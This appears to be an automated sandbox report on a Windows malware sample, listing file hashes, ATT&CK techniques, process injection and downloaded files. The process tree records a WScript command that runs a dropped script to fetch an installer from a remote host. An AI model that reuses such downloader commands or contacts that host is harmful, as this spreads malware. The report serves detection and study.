b3056c449dafe32a7546e3ded8d11967262415b0625d7e8870901f66fcdb3a95

Analysis

max time kernel
118s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
27-09-2024 15:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe
Size

184KB
MD5

faaa0eeb61294a96446a35d917a0cdaa
SHA1

3721b35068748aa18f47bb29acfe539b5f8ec091
SHA256

b3056c449dafe32a7546e3ded8d11967262415b0625d7e8870901f66fcdb3a95
SHA512

5ef3e906f3889532eac37f10f322317ad5918f81e3081e5db424c6585c9d2cfa5e25edac62ee1c7467f7e932a73c14d37e0541a14dbf4eaaefa1367732120190
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3c:/7BSH8zUB+nGESaaRvoB7FJNndnB

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2056	WScript.exe
8	2056	WScript.exe
10	2056	WScript.exe
12	2616	WScript.exe
13	2616	WScript.exe
15	596	WScript.exe
16	596	WScript.exe
18	1728	WScript.exe
19	1728	WScript.exe
21	536	WScript.exe
22	536	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1856 wrote to memory of 2056	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	30
PID 1856 wrote to memory of 2056	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	30
PID 1856 wrote to memory of 2056	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	30
PID 1856 wrote to memory of 2056	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	30
PID 1856 wrote to memory of 2616	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	33
PID 1856 wrote to memory of 2616	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	33
PID 1856 wrote to memory of 2616	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	33
PID 1856 wrote to memory of 2616	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	33
PID 1856 wrote to memory of 596	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	35
PID 1856 wrote to memory of 596	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	35
PID 1856 wrote to memory of 596	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	35
PID 1856 wrote to memory of 596	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	35
PID 1856 wrote to memory of 1728	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	37
PID 1856 wrote to memory of 1728	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	37
PID 1856 wrote to memory of 1728	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	37
PID 1856 wrote to memory of 1728	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	37
PID 1856 wrote to memory of 536	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	39
PID 1856 wrote to memory of 536	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	39
PID 1856 wrote to memory of 536	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	39
PID 1856 wrote to memory of 536	1856	faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe	39

C:\Users\Admin\AppData\Local\Temp\faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\faaa0eeb61294a96446a35d917a0cdaa_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1856
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufBB82.js" http://www.djapp.info/?domain=TpTMQvsxZQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufBB82.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2056
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufBB82.js" http://www.djapp.info/?domain=TpTMQvsxZQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufBB82.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2616
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufBB82.js" http://www.djapp.info/?domain=TpTMQvsxZQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufBB82.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:596
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufBB82.js" http://www.djapp.info/?domain=TpTMQvsxZQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufBB82.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1728
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufBB82.js" http://www.djapp.info/?domain=TpTMQvsxZQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufBB82.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
036d4e312162eb7fc4139dbeff473a75

SHA1
28d9e958e86419063e234e529dffe4a1f3efc811

SHA256
47b78119b4ffca57aa466b790524bbfbf77776ad62e9ba7fa68061aef6dc47a1

SHA512
33a1991c018837d5ecdf8a9c07e901faf3c84a5051f034da9cfedd78e272896f518a13e5c2b50c393111afad42bebd7351c8f8ac6f822ef560d1418f5c63e7f9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
d85bdf188c88258f030e3565e20a8e0c

SHA1
21fa1890d8f996943e7e4107df48a14e4fedabb4

SHA256
53d6a473a83e52eac2067b64b4d1b81b8082c5fbfbe2d0eba9c0e52acdb10570

SHA512
66efdef980a567085beab90ee02573d55ad132d9045f32adc71ace6baf5598a70218109718716ddfd3b164f9b0d274326ed90a77fb8a2d09f262974ed6c7b738

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BQQODH7V\domain_profile[1].htm

Filesize
6KB

MD5
dd6e7f618f63f35fb6c75fe1adce670a

SHA1
d2e400bfa9f91478ad8fab249b71e22dcd0eddd9

SHA256
daf05bbb020cfe27a3a24e7316bbbfc6e25b8e30fa42f4cd379bc15633ee1d25

SHA512
fcaa60a86efb101d06131e02f9cae4eceda4218559c94e75602c2c4c27679186ea4fd638914f8ce92d11ab6ea46df201554576ccc16b0790077d8a73f746fda0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BQQODH7V\domain_profile[1].htm

Filesize
6KB

MD5
3426da3577438e928b321c4db89aedbd

SHA1
36622d860df868a8df8e793aa4eb62ebe2b4112e

SHA256
96855d2253c098f40e05d64a3566cde3ecb4c3bc3fda71ba577fbf3fdec465ab

SHA512
b74bf7c05515ce93eac8a4a65b01eb61b56a67bc9d2d9afc4f1839ac1501d246f76e73c67b6e9b18a4846e433e7b8e9ceeac6effa202a325770ccd5273cb82ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH5\domain_profile[1].htm

Filesize
6KB

MD5
d604c31982e6ee9e27a12d7ac0bca425

SHA1
750e8f7486a5acc760ee3b805b6b3092cd62a444

SHA256
311bc466a220b290ce7e0088494bf4d5c0c6357c8ae02bff538a53106b3d6c43

SHA512
f50c79b0e5c901d9c03c848db457f515bd4905ebcf876b3f3df30972a9db2f9e6f27a880f773aeddbe96851f8b30fc4a5a9705c860b4d15668b77e0f3913989a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH5\domain_profile[1].htm

Filesize
6KB

MD5
4b900994cca32bcdfee342dde4cecefe

SHA1
b331fa6a0eff53ba38639e26f8730efa5a303df3

SHA256
7fd540eb878dbff9195a2e126aab503e4d3f229df3d35c091a2797a905cdd328

SHA512
32e5282b1591fb4adfda726d657b12b0d83dfc9a5c52a96df551ff9d26f66c16ee0a8a4915806389cc743893ec82d28af6d993821d54a91ea44c167cda9435dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3B8.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar1C0A.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufBB82.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4DZMS27E.txt

Filesize
177B

MD5
a628017aff987e3f25b348085f161071

SHA1
a8bbbaccaf74987d383c825f596954161adeb62d

SHA256
3bf1ab2b4f1c3f435eea733b92751a3d7f9ed7abf5ebd84be0883d77565c02a4

SHA512
c21daf97e6f0169881b634bf39eaa14bd79ea8e64ce751396b4d0198aa42318dddcf0d9fd092dc1f10b2cc0f4fd035e288a48afe5212beb30225260a5ddd033e

Download Submit